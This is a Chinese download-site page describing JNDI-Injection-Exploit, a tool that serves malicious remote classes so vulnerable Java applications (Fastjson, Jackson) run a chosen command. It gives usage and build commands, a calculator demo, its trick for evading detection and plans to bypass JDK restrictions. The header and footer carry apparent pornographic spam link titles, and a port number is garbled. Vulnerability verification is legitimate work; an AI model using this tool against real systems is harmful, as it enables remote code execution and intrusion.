在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

電子發燒友App

硬聲App

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示
電子發燒友網>電子資料下載>電子資料>JNDI-Injection-Exploit JNDI注入測試工具

JNDI-Injection-Exploit JNDI注入測試工具

2022-06-14 | zip | 0.36 MB | 次下載 | 2積分

資料介紹

授權協議 MIT
開發語言 Java
操作系統 跨平臺
軟件類型 開源軟件
所屬分類 開發工具測試工具

軟件簡介

JNDI-Injection-Exploit —— JNDI 注入利用工具,生成 JNDI 鏈接并啟動后端相關服務,可用于 Fastjson、Jackson 等相關漏洞的驗證。

使用

可執行程序為 jar 包,在命令行中運行以下命令:

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

其中:

  • -C?- 遠程 class 文件中要執行的命令。

    (可選項 , 默認命令是 mac 下打開計算器,即"open /Applications/Calculator.app")

  • -A?- 服務器地址,可以是 IP 地址或者域名。

    (可選項 , 默認地址是第一個網卡地址)

注意:

  • 要確保?109913898180?端口可用,不被其他程序占用。

    或者你也可以在 run.ServerStart 類 26~28 行更改默認端口。

  • 命令會被作為參數傳入?Runtime.getRuntime().exec()

    所以需要確保命令傳入 exec() 方法可執行。

    bash等可在shell直接執行的相關命令需要加雙引號,比如說 java -jar JNDI.jar -C "bash -c ..."

示例

本地演示:

  1. 啟動 JNDI-Injection-Exploit:

    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

poYBAGKjJXCAaDW1AAJ7A5uaRg0090.png

我們需要把第一步中生成的 JNDI 鏈接注入到存在漏洞的應用環境中,方便解釋用如下代碼模仿漏洞環境:

public static void main(String[] args) throws Exception{
    InitialContext ctx = new InitialContext();
    ctx.lookup("rmi://127.0.0.1/fgf4fp");
}

當上面代碼運行后,應用便會執行相應命令,這里是彈出計算器,沒截圖,可以自己測一下。

截圖是工具的server端日志:

pYYBAGKjJXKAPjLkAAO3qzJEzW0904.png

安裝

下面兩種方法都可以得到Jar包

  1. ?Realease直接下載最新的Jar。

  2. 把源碼下載到本地然后自行編譯打包。(在Java1.7+ 、Java1.8+ 和 Maven 3.x+環境下測試可以)

    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    $ cd JNDI-Injection-Exploit
    $ mvn clean package -DskipTests

工具實現

  1. 首先生成的鏈接后面codebaseClass是6位隨機的,這個是因為不希望讓工具生成的鏈接本身成為一種特征被監控或攔截。
  2. 服務器地址實際就是codebase地址,相比于marshalsec中的JNDI server來說,這個工具把JNDI server和HTTP server綁定到一起,并自動啟動HTTP server返回相應class,更自動化了。
  3. HTTP server基于jetty實現的,本質上是一個能下載文件的servlet,比較有意思的是我提前編譯好class模板放到resource目錄,然后servlet會讀取class文件,使用ASM框架對讀取的字節碼進行修改,然后插入我們想要執行的命令,返回修改后的字節碼。

待實現

  • (已完成EL表達式繞過部分)在更高版本的 JDK 環境中 trustURLCodebase 變量為 false,限制了遠程類的加載,我會找時間把JNDI-Injection-Bypass這個項目的東西融入到本項目中,生成能繞過 JDK 限制 JNDI 鏈接。
?

下載該資料的人也在下載 下載該資料的人還在閱讀
更多 >

評論

查看更多

下載排行

本周

  1. 1九陽豆漿機高清原理圖
  2. 2.47 MB   |  15次下載  |  1 積分
  3. 2AIWA J470維修手冊 (可直接打印)
  4. 3.16 MB   |  3次下載  |  10 積分
  5. 3數能NU501系列恒流芯片型號選型表
  6. 0.04 MB   |  2次下載  |  免費
  7. 4Eurotherm TKS Temperature 用戶手冊
  8. 1.46 MB  |  2次下載  |  免費
  9. 5多值電場型電壓選擇晶體管結構
  10. 0.11 MB   |  1次下載  |  免費
  11. 6MOSFET講解-01(可下載)
  12. 253.76 KB  |  1次下載  |  免費
  13. 7MOSFET講解-02(可下載)
  14. 263.46 KB  |  1次下載  |  免費
  15. 8MOSFET講解-03(可下載)
  16. 501.18 KB  |  1次下載  |  免費

本月

  1. 1晶體三極管的電流放大作用詳細說明
  2. 0.77 MB   |  32次下載  |  2 積分
  3. 2Python從入門到精通背記手冊
  4. 18.77 MB   |  24次下載  |  1 積分
  5. 3雙極型三極管放大電路的三種基本組態的學習課件免費下載
  6. 4.03 MB   |  23次下載  |  1 積分
  7. 4第十一屆 藍橋杯 單片機設計與開發項目 省賽 程序設計試題及源碼
  8. 90.88KB   |  23次下載  |  3 積分
  9. 5多級放大電路的學習課件免費下載
  10. 1.81 MB   |  21次下載  |  2 積分
  11. 6STM32F103C8T6開發板最小系統原理圖
  12. 0.78 MB   |  21次下載  |  免費
  13. 7九陽豆漿機高清原理圖
  14. 2.47 MB   |  15次下載  |  1 積分
  15. 81875功放原理圖
  16. 0.04 MB   |  11次下載  |  免費

總榜

  1. 1matlab軟件下載入口
  2. 未知  |  935127次下載  |  10 積分
  3. 2開源硬件-PMP21529.1-4 開關降壓/升壓雙向直流/直流轉換器 PCB layout 設計
  4. 1.48MB  |  420063次下載  |  10 積分
  5. 3Altium DXP2002下載入口
  6. 未知  |  233089次下載  |  10 積分
  7. 4電路仿真軟件multisim 10.0免費下載
  8. 340992  |  191382次下載  |  10 積分
  9. 5十天學會AVR單片機與C語言視頻教程 下載
  10. 158M  |  183337次下載  |  10 積分
  11. 6labview8.5下載
  12. 未知  |  81585次下載  |  10 積分
  13. 7Keil工具MDK-Arm免費下載
  14. 0.02 MB  |  73814次下載  |  10 積分
  15. 8LabVIEW 8.6下載
  16. 未知  |  65988次下載  |  10 積分
主站蜘蛛池模板: 35pao强力打造 | 免费一区二区三区 | 成年人视频黄色 | 久久精品免费在线观看 | 国产婷婷 | 国产亚洲精品美女2020久久 | 6月婷婷 | 天天爽夜夜爽夜夜爽 | 亚洲综合春色另类久久 | 国产精品美女在线 | 天天干天天操天天摸 | 午夜伦理片在线观看 | 欧美一级做一级做片性十三 | 色多多在线观看播放 | 就去色播 | 亚洲国产丝袜精品一区杨幂 | 四虎影院在线观看免费 | 3344a毛片在线看 | 在线天堂中文新版www | 欧美簧片 | 国产三级在线观看播放 | 看全黄大片狐狸视频在线观看 | www射com | 成人免费aaaaa毛片 | haose16在线永久免费 | 国产精品美女免费视频大全 | 男人的天堂一区二区视频在线观看 | 狼狼狼色精品视频在线播放 | 免费爱做网站在线看 | 一道精品视频一区二区三区男同 | 亚洲444kkk| 在线a亚洲老鸭窝天堂新地址 | 男啪女色黄无遮挡免费视频 | 午夜激情小视频 | 婷婷亚洲综合五月天在线 | 成年午夜一级毛片视频 | 欧美xxxx色视频在线观看免费 | 妇少香港三日本三级视频 | 天天想夜夜操 | 欧美色碰碰碰免费观看长视频 | 美女被强插 |